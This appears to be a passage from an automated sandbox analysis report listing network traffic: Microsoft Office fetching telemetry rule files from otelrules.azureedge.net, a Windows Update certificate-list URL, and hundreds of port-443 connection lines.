Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
